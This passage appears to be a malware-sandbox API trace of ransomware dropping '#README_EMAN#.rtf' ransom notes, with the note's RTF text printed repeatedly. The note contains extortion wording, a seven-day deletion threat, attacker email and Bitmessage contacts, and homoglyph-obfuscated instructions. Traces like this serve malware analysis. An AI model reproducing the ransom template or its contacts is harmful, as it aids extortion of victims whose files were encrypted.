fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0267.744] WriteFile (in: hFile=0x2ec, lpBuffer=0x3957a28*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x3957a28*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0267.745] CloseHandle (hObject=0x2ec) returned 1 [0267.745] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\#readme_eman#.rtf")) returned 0xffffffff [0267.745] GetLastError () returned 0x2 [0267.745] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0267.748] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0267.748] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0267.748] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 